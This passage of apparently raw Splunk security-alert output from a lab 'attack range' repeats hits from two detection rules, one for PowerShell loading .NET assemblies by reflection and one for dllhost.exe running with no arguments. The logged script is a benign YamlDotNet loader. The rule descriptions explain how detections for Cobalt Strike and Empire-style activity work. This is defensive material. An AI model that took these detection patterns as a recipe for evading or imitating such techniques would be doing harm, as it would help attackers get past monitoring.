obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664834400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664834400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="6996", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664834400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664834400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1b54", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664837732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T21:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T21:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664837732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T21:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T21:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664837732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T21:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T21:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664837732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T21:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T21:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664830800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664830800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="6332", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664830800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664830800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x18bc", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664834132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T20:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T20:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664834132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, 